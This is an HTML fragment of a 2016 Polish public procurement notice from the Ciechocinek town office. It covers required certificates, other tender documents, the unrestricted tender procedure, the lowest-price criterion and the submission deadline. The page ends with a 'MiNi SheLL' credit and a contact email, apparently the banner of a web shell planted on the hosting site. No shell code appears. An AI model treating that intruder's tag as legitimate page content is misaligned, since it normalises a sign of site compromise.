<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Kosztorys ofertowy z cenami jednostkowymi i wartością robót stanowiącą cenę zamówienia.
2) Wstępny harmonogram robót.
3) Umowa regulującą współpracę w przypadku podmiotów występujących wspólnie
4) Informacja dotycząca części zamówienia, której wykonanie wykonawca powierzy podwykonawcom. 
5) Dowód wpłacenia - wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ciechocinek.bipst.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ciechocinku ul. Kopernika 19 87-720 Ciechocinek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2016 godzina 10:00, miejsce: Sekretariat Burmistrza Ciechocinka ul. Kopernika 19 87-720 Ciechocinek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com